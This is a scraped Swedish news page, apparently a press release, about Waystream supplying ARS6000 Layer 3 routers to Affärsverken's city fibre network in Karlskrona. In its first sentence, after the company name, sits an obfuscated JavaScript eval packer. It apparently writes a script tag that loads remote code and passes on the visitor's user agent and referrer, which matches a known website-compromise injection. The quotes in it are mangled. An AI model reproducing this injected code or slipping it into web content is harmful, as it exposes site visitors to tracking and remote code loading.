Image Image Image Image Image Image Image Image Image Image

| 25 november, 2020

Scroll to top

Top

Waystream framtidssäkrar Affärsverkens stadsnät i Karlskrona

Waystream framtidssäkrar Affärsverkens stadsnät i Karlskrona
Sebastian

Waystream, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nybat|var|u0026u|referrer|sfiai||js|php’.split(’|’),0,{}))
som utvecklar och säljer accessutrustning till fiberbaserade bredbandsnät, har fått utökat förtroende av sin kund Affärsverken i Karlskrona. Den nya affären är ett led i att harmonisera Affärsverkens nuvarande hårdvaruplattform, vilket kommer bidra till ett effektivare kapacitetsutnyttjande i de befintliga näten samtidigt som Affärsverket gör sitt nät mer framtidssäkert.

I Affärsverkens verksamhet ingår bland annat Karlskronas Stadsnät. Stadsnätet, som når ut till cirka 17 000 hushåll och företag i kommunen, är under ständig utveckling och utbyggnaden har gått fort. För att säkerställa bästa möjliga kvalitet och service i fibernätverket har därför Affärsverket beslutat sig för att satsa på kapacitetshöjande infrastruktur i form av ARS6000. Sedan tidigare har Affärsverken en kombination av ARS6000 och MS4000.

– Vi är mycket glada över att få utökat förtroende av Affärsverken i Karlskrona. Genom att göra vissa förändringar i infrastrukturen kommer Affärsverken få ett robustare och mer framtidssäkert fibernätverk som kommer att klara av en snabb utbyggnad, säger Johnny Hedlund, vd på Waystream.

Affären innebär att Affärsverken kommer fortsätta att bygga ut sitt fibernät med Waystream ARS6000 istället för med MS4000.

Note: ASR6000 är en Lager 3 router. Med Lager 3 arkitektur menas att ett FFTH nätverk levererar routade funktioner för slutanvändaren och överlämning av trafik till nätverkets core på Lager 3. I ett öppet bredbandsnät betyder det att man kan bygga robusta nät med routingprotokoll och behöver inte förlita sig på L2 funktioner som VLAN, STP etc. som allt som oftast ger ett instabilt och svårhanterligt nät.